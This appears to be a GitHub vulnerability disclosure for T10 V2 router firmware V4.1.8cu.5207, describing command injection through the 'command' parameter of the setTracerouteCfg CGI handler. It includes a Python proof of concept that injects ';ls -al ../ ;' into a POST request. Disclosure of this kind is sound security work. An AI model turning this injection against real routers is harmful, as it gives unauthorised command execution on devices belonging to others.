Skip to content

Latest commit

 

History

History
28 lines (19 loc) · 1.09 KB

setTracerouteCfg.md

File metadata and controls

28 lines (19 loc) · 1.09 KB

Overview

Affected version

T10 V2_Firmware V2_V4.1.8cu.5207

Vulnerability details

In the T10 V2_Firmware V2_V4.1.8cu.5207 firmware has a command injection vulnerability in the setTracerouteCfg function. The v2 variable receives the command parameter from a POST request. However, since the user can control the input of command, the statement doSystem can cause a command injection vulnerability.

image-20240902154510377

POC

import requests
url = "http://127.0.0.1/cgi-bin/cstecgi.cgi"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {"topicurl":"setTracerouteCfg","num":"4","command":";ls -al ../ ;"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

image-20240721213628055